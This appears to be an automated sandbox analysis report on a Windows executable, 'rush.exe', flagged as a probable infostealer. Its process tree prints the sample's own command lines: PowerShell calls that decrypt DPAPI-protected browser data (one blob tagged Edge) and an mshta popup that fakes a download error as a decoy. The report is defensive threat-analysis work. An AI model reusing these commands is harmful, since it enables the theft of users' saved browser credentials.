Resubmissions

24-02-2024 15:39

240224-s3pjsafg69 7

24-02-2024 14:20

240224-rnqmvseb57 7

Analysis

  • max time kernel
    154s
  • max time network
    180s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-02-2024 14:20

General

  • Target

    rush.exe

  • Size

    154.5MB

  • MD5

    b5261fd859757d5419ba332a2b97901b

  • SHA1

    cea7201fff575ae33ad8d4ab2adc923f2e6bba43

  • SHA256

    cc6fb688c56d470763291ec24d591b6f0c26ff14b0b9a27b1365129eae913027

  • SHA512

    269b3f9861404f78e58b0e51a9918531e75317ed8d2f25dfb4f11c11598824ff9097a611fe2f0c056190e920e5de8ed234fbda508adc44e037ddf71be266f1d4

  • SSDEEP

    1572864:wCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:KDAgZi

Score
7/10

Malware Config

Signatures

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\rush.exe
    "C:\Users\Admin\AppData\Local\Temp\rush.exe"
    1⤵
    • Drops startup file
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2196
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1124
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:2324
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1592
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:3552
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,215,47,175,172,148,246,219,68,133,227,1,185,157,236,117,198,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,58,129,229,137,126,9,178,109,22,148,227,86,114,117,199,9,113,48,155,112,171,220,37,105,195,49,239,54,63,242,209,70,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,83,8,78,247,178,209,53,70,84,116,95,34,212,38,170,155,22,48,7,124,243,40,143,153,173,100,34,5,107,186,215,192,48,0,0,0,36,253,194,250,181,93,176,165,134,159,131,86,153,52,85,183,87,118,48,28,235,236,36,105,253,145,255,149,106,211,174,136,244,47,35,147,30,45,94,121,9,129,184,56,115,87,127,141,64,0,0,0,147,80,8,143,44,46,111,115,178,94,15,225,240,79,47,177,156,249,230,137,12,175,45,172,48,210,77,91,29,193,220,182,36,83,106,134,18,170,157,225,63,232,239,73,247,126,204,13,66,3,154,67,169,138,198,1,119,171,38,113,61,232,150,26), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:4736
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,215,47,175,172,148,246,219,68,133,227,1,185,157,236,117,198,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,58,129,229,137,126,9,178,109,22,148,227,86,114,117,199,9,113,48,155,112,171,220,37,105,195,49,239,54,63,242,209,70,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,83,8,78,247,178,209,53,70,84,116,95,34,212,38,170,155,22,48,7,124,243,40,143,153,173,100,34,5,107,186,215,192,48,0,0,0,36,253,194,250,181,93,176,165,134,159,131,86,153,52,85,183,87,118,48,28,235,236,36,105,253,145,255,149,106,211,174,136,244,47,35,147,30,45,94,121,9,129,184,56,115,87,127,141,64,0,0,0,147,80,8,143,44,46,111,115,178,94,15,225,240,79,47,177,156,249,230,137,12,175,45,172,48,210,77,91,29,193,220,182,36,83,106,134,18,170,157,225,63,232,239,73,247,126,204,13,66,3,154,67,169,138,198,1,119,171,38,113,61,232,150,26), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3996
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,215,47,175,172,148,246,219,68,133,227,1,185,157,236,117,198,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,150,22,102,245,223,154,220,44,1,68,105,68,241,134,140,88,179,14,219,66,71,178,230,125,117,222,85,105,204,70,167,63,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,42,234,53,91,152,98,23,167,32,149,18,45,221,141,215,94,84,227,40,245,79,125,50,182,183,213,184,191,163,73,143,196,48,0,0,0,196,38,9,39,129,54,94,148,36,94,123,4,211,23,32,6,67,98,33,144,56,148,217,53,14,49,143,118,222,25,186,34,226,191,126,249,209,240,175,175,70,190,249,175,50,187,108,141,64,0,0,0,16,235,82,249,154,166,155,79,39,251,67,16,14,149,231,69,8,50,84,31,39,199,129,174,146,56,233,123,135,75,105,227,98,187,57,125,75,189,86,147,128,60,105,26,36,153,99,88,109,98,60,168,8,201,112,255,154,143,194,172,213,40,100,222), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:400
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,215,47,175,172,148,246,219,68,133,227,1,185,157,236,117,198,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,150,22,102,245,223,154,220,44,1,68,105,68,241,134,140,88,179,14,219,66,71,178,230,125,117,222,85,105,204,70,167,63,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,42,234,53,91,152,98,23,167,32,149,18,45,221,141,215,94,84,227,40,245,79,125,50,182,183,213,184,191,163,73,143,196,48,0,0,0,196,38,9,39,129,54,94,148,36,94,123,4,211,23,32,6,67,98,33,144,56,148,217,53,14,49,143,118,222,25,186,34,226,191,126,249,209,240,175,175,70,190,249,175,50,187,108,141,64,0,0,0,16,235,82,249,154,166,155,79,39,251,67,16,14,149,231,69,8,50,84,31,39,199,129,174,146,56,233,123,135,75,105,227,98,187,57,125,75,189,86,147,128,60,105,26,36,153,99,88,109,98,60,168,8,201,112,255,154,143,194,172,213,40,100,222), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4556
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4496
      • C:\Windows\system32\mshta.exe
        mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
        3⤵
          PID:4668
      • C:\Users\Admin\AppData\Local\Temp\rush.exe
        "C:\Users\Admin\AppData\Local\Temp\rush.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\rush" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1916,i,7131962145040196884,5909725407864677955,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        2⤵
          PID:4216
        • C:\Users\Admin\AppData\Local\Temp\rush.exe
          "C:\Users\Admin\AppData\Local\Temp\rush.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\rush" --mojo-platform-channel-handle=2176 --field-trial-handle=1916,i,7131962145040196884,5909725407864677955,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
          2⤵
            PID:5080

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          f48896adf9a23882050cdff97f610a7f

          SHA1

          4c5a610df62834d43f470cae7e851946530e3086

          SHA256

          3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78

          SHA512

          16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          46d6c89b6a449ce91c1a3691c516e10e

          SHA1

          dedf2c05d83a8fc311e39fa86af575866f9f7ece

          SHA256

          f6841440d2949cf97fb621923a2f931fca567382856cb60fa4c8ce3f9b81e55f

          SHA512

          bd222cc430c28abe832787973ed2a7a07d58d92f34eed1ebfe69fc4cd8ed59443ed93799979fd39d1b76ef6ff247f3ceb12b3c537de09ffba72ebec748f3e1cd

        • C:\Users\Admin\AppData\Local\Temp\1b392f73-58c0-430d-b581-3d6b66a43242.tmp.node

          Filesize

          137KB

          MD5

          04bfbfec8db966420fe4c7b85ebb506a

          SHA1

          939bb742a354a92e1dcd3661a62d69e48030a335

          SHA256

          da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd

          SHA512

          4ea97a9a120ed5bee8638e0a69561c2159fc3769062d7102167b0e92b4f1a5c002a761bd104282425f6cee8d0e39dbe7e12ad4e4a38570c3f90f31b65072dd65

        • C:\Users\Admin\AppData\Local\Temp\75b13ace-37be-4df8-b144-5eac45676423.tmp.node

          Filesize

          1.8MB

          MD5

          3072b68e3c226aff39e6782d025f25a8

          SHA1

          cf559196d74fa490ac8ce192db222c9f5c5a006a

          SHA256

          7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01

          SHA512

          61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ewrvafv2.ayg.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\importantfiles.zip

          Filesize

          22B

          MD5

          76cdb2bad9582d23c1f6f4d868218d6c

          SHA1

          b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

          SHA256

          8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

          SHA512

          5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

        • memory/3996-27-0x00007FF905AB0000-0x00007FF906571000-memory.dmp

          Filesize

          10.8MB

        • memory/3996-23-0x0000023C30740000-0x0000023C30790000-memory.dmp

          Filesize

          320KB

        • memory/3996-21-0x0000023C2E280000-0x0000023C2E290000-memory.dmp

          Filesize

          64KB

        • memory/3996-22-0x0000023C2E280000-0x0000023C2E290000-memory.dmp

          Filesize

          64KB

        • memory/3996-20-0x00007FF905AB0000-0x00007FF906571000-memory.dmp

          Filesize

          10.8MB

        • memory/3996-15-0x0000023C15C40000-0x0000023C15C62000-memory.dmp

          Filesize

          136KB

        • memory/4556-30-0x00007FF905AB0000-0x00007FF906571000-memory.dmp

          Filesize

          10.8MB

        • memory/4556-31-0x000001EEEF970000-0x000001EEEF980000-memory.dmp

          Filesize

          64KB

        • memory/4556-32-0x000001EEEF970000-0x000001EEEF980000-memory.dmp

          Filesize

          64KB

        • memory/4556-43-0x000001EEEF970000-0x000001EEEF980000-memory.dmp

          Filesize

          64KB

        • memory/4556-46-0x00007FF905AB0000-0x00007FF906571000-memory.dmp

          Filesize

          10.8MB